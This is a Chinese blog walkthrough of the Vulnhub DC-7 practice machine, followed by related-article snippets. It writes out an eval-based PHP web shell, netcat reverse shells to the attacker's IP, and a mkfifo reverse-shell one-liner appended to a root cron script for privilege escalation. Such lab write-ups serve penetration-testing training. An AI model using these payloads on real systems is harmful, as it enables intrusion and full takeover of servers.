Vulnhub靶机实战——DC-7

最新推荐文章于 2024-04-27 21:56:30 发布
最新推荐文章于 2024-04-27 21:56:30 发布
阅读量4.8k 收藏 13
点赞数 9
分类专栏: 靶机 文章标签: DC-7 靶机 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43583637/article/details/102809227
版权

 靶机DC-7下载地址:https://download.vulnhub.com/dc/DC-7.zip

环境:VMware 15虚拟机软件

         DC-7靶机IP地址:192.168.220.154

         Kali的IP地址:192.168.220.155

 

DC-6靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.155

ip addr

使用nmap工具扫描192.168.220.0网段的存活主机,发现靶机dc7的IP地址为192.168.220.154

nmap -T4 -sP 192.168.220.0/24 -oN nmap220.sP

使用nmap工具扫描靶机dc7开放的端口,发现已开放的端口有22(SSH)、80(HTTP)

nmap  -A 192.168.220.154 -p- -oN nmap154.A

使用kali下的网站指纹工具whatweb查看靶机搭建的网站,发现是使用Drupal 8搭建的网站

whatweb http://192.168.220.154

浏览器打开网站,是一个欢迎界面并给出了一个提示,提示将暴力破解和字典排除在外,需要另外的思路,发现在欢迎页面的左下角有一个“@DC7USER”,应该是接入点

http://192.168.220.154/

欢迎来到DC-7

DC-7引入了一些“新”概念,但是我会让您知道它们是什么。:-)

尽管这一挑战并不是技术性的全部,但是如果您需要诉诸于暴力破解或字典攻击,那么您可能不会成功。

您将要做的就是在盒子外面思考。

方式在盒子外面。:-)

在百度搜索@DC7USER后,发现是一个Twitter用户,进入Twitter后搜索这个用户,进入这个用户首页,发现一个GitHub的链接

https://github.com/Dc7User/

 

点击GitHub的链接发现一个staffdb的源码文件夹,并给了提示这源码是dc7靶机的突破口

https://github.com/Dc7User/staffdb

打开kali,将源码下载到本地

git clone  https://github.com/Dc7User/staffdb

分析源码,发现一个config.php文件,在这个配置文件里找到了用户名和密码

cat config.php

dc7user/MdR3xOgB7#dW

使用SSH链接靶机,登录dc7user发现可以成功连接

ssh dc7user@192.168.220.154

发现一个backups文件夹和一个mbox文件

进入backups文件夹,发现两个文件,但都是以gpg结尾的,gpg命令是用来加密文件的,加密后的文件都是乱码

cd backups

打开mbox文件发现是一个计划任务,定时备份,并发现备份执行的源码在/opt/scripts目录下

cat mbox

进入到/opt/scripts目录下,查看backups.sh脚本文件,发现两个命令gpg和drush

gpg命令用来加密,drush命令是drupal框架中用来做一些配置的命令,它可以改变用户名密码

cd /opt/scripts

cat backups.sh

进入到/var/www/html目录下,因为网站会有一个admin用户,所以使用drush命令修改admin用户的密码为123456,发现可以修改成功

cd /var/www/html/

drush user-password admin --password="123456"

来到网站后台,使用admin/123456登录网站,成功登录

http://192.168.220.154/user/login

在Content—>Add content-->Basic page下,准备添加PHP代码反弹shell,但发现Drupal 8不支持PHP代码,百度后知道Drupal 8后为了安全,需要将php单独作为一个模块导入

Php介绍页面如下,模块包下载地址也附上

https://www.drupal.org/project/php

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

点击Install new module,将下载模块包的链接添加上,点击Install

Install后跳转到模块添加成功页面,然后去激活这个模块

选择FILTERS,勾选PHP点击Install安装,安装成功后会有提示

然后来到网站开始的欢迎页面,对该页面进行编辑,添加一句话PHP代码,并保存为PHP代码

GetShell
<?php
@eval($_REQUEST[666]);
?>

因为欢迎页面是网站的首页,所以直接使用中国蚁剑连接网站,成功连接getshell

http://192.168.220.154/
密码:666

在这里我习惯性的又再次反弹了一次shell到kali,当然在这里不反弹shell到kali下面也可以在蚁剑虚拟终端上做下面步骤

在kali监听4567端口,并反弹shell到kali,切换shell外壳

nc -e /bin/bash 192.168.220.155 4567
nc -lvvp 4567
python -c 'import pty;pty.spawn("/bin/bash")'

当前用户是www-data,在/opt/scripts目录下的backups.sh脚本文件所属组是www-data,所以www-data用户可以对这个脚本文件进行操作,并且这个脚本文件定时执行可以利用它来反弹shell

写入反弹shell代码到backups.sh脚本文件中,并在kali监听1234端口,等待计划任务执行,稍微等待后成功getshell

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.220.155 1234 >/tmp/f" >> backups.sh

nc -lvvp 1234

得到root权限后,进入root家目录下,发现theflag.txt文件

cd /root

cat theflag.txt

冠霖L
关注
  • 9
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
DC-7渗透笔记
现代鲁滨逊的博客
05-12 239
做得多了就感觉只是无聊的步骤的重复,毫无技术上的提升,我感觉我不想再做下去了。 1.发现主机192.168.174.158 2.照例nmap扫描,22和80端口都开着呢。 3,访问站点,drupal的cms,dc-1的站点也是由drupal搭建的。 然后中间的提示是想传递一种新概念,不要暴力破解,让我们在盒子外面思考??get不到。 4.想扫目录来着,扫了好久都没扫完,就算了。 5.进到登录界面,想看看有没有sql注入的,扔到sqlmap,啥也没跑出来☹☹ 6.没有思路,瞎捣鼓一通之后
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
Aluxian_的博客
04-01 6006
Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战靶机DC7 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/dc/D
DC-7靶场
mlws1900的博客
03-27 978
常规思路是用searchsploit找相关漏洞进行利用,看大佬wp发现查看漏洞发现不行,这个信息收集是在互联网上进行的,我们搜索下面这个作者的名字@DC7USER,可以看到如下内容。很多文章在这里就教用户去写小马了,但是需要在搜索栏搜索一下php这个插件是否开启,勾选并点击install,否则写的php代码不会被解析。同样,因为这个cms支持添加插件,看大佬的wp,要下载一个支持php的插件,然后写入shell。我们进入主界面,点击content,点击basic page,写入小马。
VulnHub靶机 DC-9 靶机 详细渗透过程
最新发布
rumil的博客
04-27 1441
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
【CyberSecurityLearning 76】DC系列之DC-7渗透测试(Drupal)
_Co1a
05-09 892
目录 DC-7靶机渗透测试 1、信息收集 1.1 扫描开放的端口 1.2 访问WEB站点 2、登录ssh 3、 提权(suid提权) 3.1 exim4提权 4、drush 命令对任意用户密码进行更改 5、登录admin 6、拿到root权限 DC-7靶机渗透测试 0x00实验环境 kali的IP:192.168.3.188 DC-7的MAC地址:00:0C:29:FB:B4:27(192.168.3.191) (使用Kali中的arp-scan工具扫描也可) 1.
Vulnhub系列之DC7靶场详解
weixin_50053818的博客
05-30 1082
文章目录环境信息收集安装插件拿shell提权 环境 vulhub系列之DC7靶场 VMware虚拟机 kali 信息收集 由目标靶机的MAC地址得到目标IP为192.168.137.103,直接nmap扫描。 可以知道目标开放了80和22端口,直接进入网站。 进入网站发现CMS是drupal 8,在漏洞进行搜索,无果。所以只能查看网站。翻译一下首页的内容。 欢迎来到DC-7 DC-7引入了一些“新”概念,但我将让您弄清楚它们是什么。 ???? 尽管此挑战并不是技术性的全部,但如果您需要诉诸于暴力破
DC-7靶机渗透测试 (GPG,drush,mkfifo,nc提权)
single_g_l的博客
08-13 1189
找到上传路径Content—>Add content-->Basic page下,准备添加PHP代码反弹shell,但发现Drupal 8不支持PHP代码,需要安装插件,将php模块(https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz)导入(导入路径extend—>+Install new module),导入成功后在extend中添加模块。解锁之后,账号才成功登录。查看config文件,发现账号密码,尝试登录,发现报错,账号或密码不正确。...
[Vulnhub] DC-7
weixin_63231007的博客
01-30 335
DC系列靶机-第七弹(git信息泄露&Drupal反弹shell&drush修改Drupal账号密码)
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC user guide
01-08
Design Compile的官方用户手册,是使用DC进行电路综合必不可少的参考手册
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
入侵靶机DC-7
干铮的博客
10-08 1446
DC-7 1.主机发现 靶机开机后DHCP获取有ip地址 2.信息收集 端口扫描 C:\Users\ASUS>Nmap 192.168.43.111 -A -p- -oN nmap.A Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-08 08:29 ?D1ú±ê×?ê±?? Nmap scan report for dc-7 (192.168.43.111) Host is up (0.00030s latency). Not s
Vulnhub靶机DC系列-DC-7
m0_54525483的博客
01-07 1371
Vulnhub靶机DC系列-DC-7 靶场名称:DC-7 靶场地址:https://www.vulnhub.com/entry/dc-7,356/ 下载地址: ** DC-7.zip (Size: 939 MB) Download: http://www.five86.com/downloads/DC-7.zip Download (Mirror): https://download.vulnhub.com/dc/DC-7.zip Download (Torrent): https://download.v
Vulnhub | DC: 7 |【实战
bin789456的博客
08-11 1054
靶场链接:DC系列,有些知识点在DC:1中提到,可以翻阅。信息搜集 首先进行存活扫描 在这里插入图片描述 185为攻击目标,61为网关,141为物理机,115为攻击机 端口及服务详情扫描,发现有80和22端口 在这里插入图片描述 先查看一下80端口的网页,指纹非常明显,在DC1也是类似的界面,指纹是Drupal cms 在这里插入图片描述 作者给了一段话 翻译: DC-7引入了一些“新”概念,但我将留给你们去弄清楚它们是什么 虽然这个挑战并不完全是技术性的,但如果你需要诉诸暴力或字典攻击,你可能不会成
DC-7--vulnhub靶场
m0_46982383的博客
07-30 927
http网络模式NAT在下面在代码config.php中找到一个账号密码在robots.txt中,发现登录界面路径用之前的账号密码登不了,想起还有个22端口的ssh,试试,可以查看mbox虽然很长,但是内容基本重复,可以得到的信息是存在一个定时任务,备份数据库文件,www-data具有权限,需要获取相应shell,再利用backups.sh提权drush命令可以修改密码。......
VulnHubDC-7
weixin_39219503的博客
02-02 428
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-7,356/ 题目信息如下 Description DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. W...
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值